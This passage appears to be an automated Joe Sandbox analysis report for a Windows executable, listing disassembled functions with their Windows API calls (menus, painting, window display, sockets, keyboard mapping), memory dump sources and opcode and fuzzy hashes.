                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1101466143-0
                                                                                                                                • Opcode ID: 9424fcd5f82c7cd81e0a5475f814367742dd81fafa7e1f5b96f82e754799a100
                                                                                                                                • Instruction ID: 05b03fcf994950fda8dc3bbbcb742fbefe29a7df4143ab0ea05505bf79a2156a
                                                                                                                                • Opcode Fuzzy Hash: 9424fcd5f82c7cd81e0a5475f814367742dd81fafa7e1f5b96f82e754799a100
                                                                                                                                • Instruction Fuzzy Hash: A1516AB5A00209EFCB14CF58C884AAAB7B8FF8D324B158559EE49DB315D330E951CFA0
                                                                                                                                Function 00F782DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetMenu.USER32(?), ref: 00F7833D
                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00F78374
                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F7839C
                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00F7840B
                                                                                                                                • GetSubMenu.USER32(?,?), ref: 00F78419
                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F7846A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 650687236-0
                                                                                                                                • Opcode ID: 4580d6ce79bd468ba6eea790e56d971c7f625af7767a77c8aa6861bd508fbcca
                                                                                                                                • Instruction ID: 8b1e6a272307e1fa678531444e18abc294355a4449a1605f4a310e8355399d88
                                                                                                                                • Opcode Fuzzy Hash: 4580d6ce79bd468ba6eea790e56d971c7f625af7767a77c8aa6861bd508fbcca
                                                                                                                                • Instruction Fuzzy Hash: 4151A231E00119EFCF01DF68C945AAEB7F4EF48760F14845AE919B7351CB74AE42AB91
                                                                                                                                Function 00F6936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00F69409
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F69416
                                                                                                                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00F6943A
                                                                                                                                • _strlen.LIBCMT ref: 00F69484
                                                                                                                                • _memmove.LIBCMT ref: 00F694CA
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F694F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2795762555-0
                                                                                                                                • Opcode ID: d0bdf94d36689c3a6aa13ec23cf392f8aefcfebc1197e4c5cadcf1a721dffe10
                                                                                                                                • Instruction ID: 6107f82c68a233d13b49e4f0b53c59d44f887096e5f5bcdd7eceb2b811bad714
                                                                                                                                • Opcode Fuzzy Hash: d0bdf94d36689c3a6aa13ec23cf392f8aefcfebc1197e4c5cadcf1a721dffe10
                                                                                                                                • Instruction Fuzzy Hash: 2B41A271904108AFCB14EBA4CC85AEEB7BDEF48320F208159F51697291DF78AE45EB60
                                                                                                                                Function 00F554E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F5552E
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F55579
                                                                                                                                • IsMenu.USER32(00000000), ref: 00F55599
                                                                                                                                • CreatePopupMenu.USER32 ref: 00F555CD
                                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00F5562B
                                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F5565C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3311875123-0
                                                                                                                                • Opcode ID: 9986956796177aa0d9f08e8a43a41f616ff58742425a2b90295b8949a4127306
                                                                                                                                • Instruction ID: e51de7fd72b882c093703ebbea1320b6e3d96aca7e754adc7178feb3a13e8b30
                                                                                                                                • Opcode Fuzzy Hash: 9986956796177aa0d9f08e8a43a41f616ff58742425a2b90295b8949a4127306
                                                                                                                                • Instruction Fuzzy Hash: 6F51F970900B89DFDF10CF68C8A8BAD7BF5BF05B2AF544119EE159B290D3709948DB51
                                                                                                                                Function 00F2B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F2B1C1
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F2B225
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00F2B242
                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F2B253
                                                                                                                                • EndPaint.USER32(?,?), ref: 00F2B29D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1827037458-0
                                                                                                                                • Opcode ID: 2b7bae7ac369f911cc084852aaa5f095fa4bf0430c6ce41f91fc02d9dda75228
                                                                                                                                • Instruction ID: 34b642d871c5e035f57d292f2bf433cf57cbb2a4e1be64c7f60d29c02c525e7b
                                                                                                                                • Opcode Fuzzy Hash: 2b7bae7ac369f911cc084852aaa5f095fa4bf0430c6ce41f91fc02d9dda75228
                                                                                                                                • Instruction Fuzzy Hash: 07418071504314EFD711DF24EC84BAA7BE9FB4A320F14066AF995872E1C7319845FB62
                                                                                                                                Function 00F7E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00FD1810,00000000,?,?,00FD1810,00FD1810,?,00F8E2D6), ref: 00F7E21B
                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00F7E23F
                                                                                                                                • ShowWindow.USER32(00FD1810,00000000,?,?,00FD1810,00FD1810,?,00F8E2D6), ref: 00F7E29F
                                                                                                                                • ShowWindow.USER32(?,00000004,?,?,00FD1810,00FD1810,?,00F8E2D6), ref: 00F7E2B1
                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00F7E2D5
                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F7E2F8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 642888154-0
                                                                                                                                • Opcode ID: cdacd8fa2b2585535cc4860965ffe11b59d4eabbf5487357a8914365b8f7cda1
                                                                                                                                • Instruction ID: ebf297e8969759155aac4f56f289d14a2ee67e6d8d5244e50f0f2ae522c062f8
                                                                                                                                • Opcode Fuzzy Hash: cdacd8fa2b2585535cc4860965ffe11b59d4eabbf5487357a8914365b8f7cda1
                                                                                                                                • Instruction Fuzzy Hash: B6412134A00145EFDB15CF14C499B947BE5BB0A324F1881FBEA5C8F5A3C771A845EB52
                                                                                                                                Function 00F61BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                  • Part of subcall function 00F13BCF: _wcscpy.LIBCMT ref: 00F13BF2
                                                                                                                                • _wcstok.LIBCMT ref: 00F61D6E
                                                                                                                                • _wcscpy.LIBCMT ref: 00F61DFD
                                                                                                                                • _memset.LIBCMT ref: 00F61E30
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                • String ID: X
                                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                                • Opcode ID: 42040271565627bac2e757a2b9ed90ba8f66942ef9e377f4015587212e5281f4
                                                                                                                                • Instruction ID: 4c40543b885df967f65ca307f165a224f560b6d8588c19e20ba8a00ed09438e7
                                                                                                                                • Opcode Fuzzy Hash: 42040271565627bac2e757a2b9ed90ba8f66942ef9e377f4015587212e5281f4
                                                                                                                                • Instruction Fuzzy Hash: 6CC170716087019FC714EF24CD81A9AB7E4FF85360F04492DF89A972A2DB74ED45EB82
                                                                                                                                Function 00F7E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F2B5EB
                                                                                                                                  • Part of subcall function 00F2B58B: SelectObject.GDI32(?,00000000), ref: 00F2B5FA
                                                                                                                                  • Part of subcall function 00F2B58B: BeginPath.GDI32(?), ref: 00F2B611
                                                                                                                                  • Part of subcall function 00F2B58B: SelectObject.GDI32(?,00000000), ref: 00F2B63B
                                                                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F7E9F2
                                                                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 00F7EA06
                                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7EA14
                                                                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 00F7EA24
                                                                                                                                • EndPath.GDI32(00000000), ref: 00F7EA34
                                                                                                                                • StrokePath.GDI32(00000000), ref: 00F7EA44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 43455801-0
                                                                                                                                • Opcode ID: 0e966ef258828be102f2d0056f5570c4e956cb2dd3d42ac7270e1cf76049ec1a
                                                                                                                                • Instruction ID: 7341588543302ad565333e53b848b032e7ddafe797c6d9bdae5d503d4181c00f
                                                                                                                                • Opcode Fuzzy Hash: 0e966ef258828be102f2d0056f5570c4e956cb2dd3d42ac7270e1cf76049ec1a
                                                                                                                                • Instruction Fuzzy Hash: 1311F77600014DBFEB029F95DC88E9A7FADEB08360F148012FA094A160D7719D55ABA0
                                                                                                                                Function 00F4EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(00000000), ref: 00F4EFB6
                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F4EFC7
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F4EFCE
                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00F4EFD6
                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F4EFED
                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00F4EFFF
                                                                                                                                  • Part of subcall function 00F4A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00F4A79D,00000000,00000000,?,00F4AB73), ref: 00F4B2CA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 603618608-0
                                                                                                                                • Opcode ID: e7c6bb580678adb070cab0f24ef85898c12a572418dc6b4743650e8df4414830
                                                                                                                                • Instruction ID: 467120b6f5e9dcbf4a025cd87df374f663527a202985779071efd18491727c43
                                                                                                                                • Opcode Fuzzy Hash: e7c6bb580678adb070cab0f24ef85898c12a572418dc6b4743650e8df4414830
                                                                                                                                • Instruction Fuzzy Hash: 2C01A2B5E00309BFEB109BA6DC49B5EBFB8EB48361F104066FE04AB290D6709C00DF61
                                                                                                                                Function 00F387D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __init_pointers.LIBCMT ref: 00F387D7
                                                                                                                                  • Part of subcall function 00F31E5A: __initp_misc_winsig.LIBCMT ref: 00F31E7E
                                                                                                                                  • Part of subcall function 00F31E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F38BE1
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,FlsAlloc), ref: 00F38BF5
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,FlsFree), ref: 00F38C08
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,FlsGetValue), ref: 00F38C1B
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,FlsSetValue), ref: 00F38C2E
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F38C41
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F38C54
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F38C67
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F38C7A
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F38C8D
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F38CA0
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F38CB3
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F38CC6
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,SetThreadpoolWait), ref: 00F38CD9
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F38CEC
                                                                                                                                  • Part of subcall function 00F31E5A: 6C3C6DE0.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F38CFF
                                                                                                                                • __mtinitlocks.LIBCMT ref: 00F387DC
                                                                                                                                  • Part of subcall function 00F38AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00FCAC68,00000FA0,?,?,00F387E1,00F36AFA,00FC67D8,00000014), ref: 00F38AD1
                                                                                                                                • __mtterm.LIBCMT ref: 00F387E5
                                                                                                                                  • Part of subcall function 00F3884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00F389CF
                                                                                                                                  • Part of subcall function 00F3884D: _free.LIBCMT ref: 00F389D6
                                                                                                                                  • Part of subcall function 00F3884D: RtlDeleteCriticalSection.NTDLL(00FCAC68), ref: 00F389F8
                                                                                                                                • __calloc_crt.LIBCMT ref: 00F3880A
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F38833
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3163737558-0
                                                                                                                                • Opcode ID: dbb70e821bece1cbed992c8e49b76e603aff314ef693dfb5f454b72f8b51445d
                                                                                                                                • Instruction ID: 7f8203bd2f70128fe78bd01366b1990621c7693a4fb65db8fc2906da1ee6a0fc
                                                                                                                                • Opcode Fuzzy Hash: dbb70e821bece1cbed992c8e49b76e603aff314ef693dfb5f454b72f8b51445d
                                                                                                                                • Instruction Fuzzy Hash: 9CF0BE335197116AE6747B38BC07A8A3AC09F017F4F610A2AF460D70E2FF5C98837165
                                                                                                                                Function 00F5A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1423608774-0
                                                                                                                                • Opcode ID: 89e80f6966c248e41145d7bfd8dc4a30af0548d72b9b4f6bc0318a9725791bb5
                                                                                                                                • Instruction ID: 8d8c8dc4cae89ac8dd918f996fd4463a0ec9a147192e9f82546460609eaece15
                                                                                                                                • Opcode Fuzzy Hash: 89e80f6966c248e41145d7bfd8dc4a30af0548d72b9b4f6bc0318a9725791bb5
                                                                                                                                • Instruction Fuzzy Hash: 3801F432501615EBD7152F64EC48DEB77A9FF89313B50022AFA03924A1CBB6A815EB61
                                                                                                                                Function 00F11867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F11898
                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F118A0
                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F118AB
                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F118B6
                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F118BE
                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F118C6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
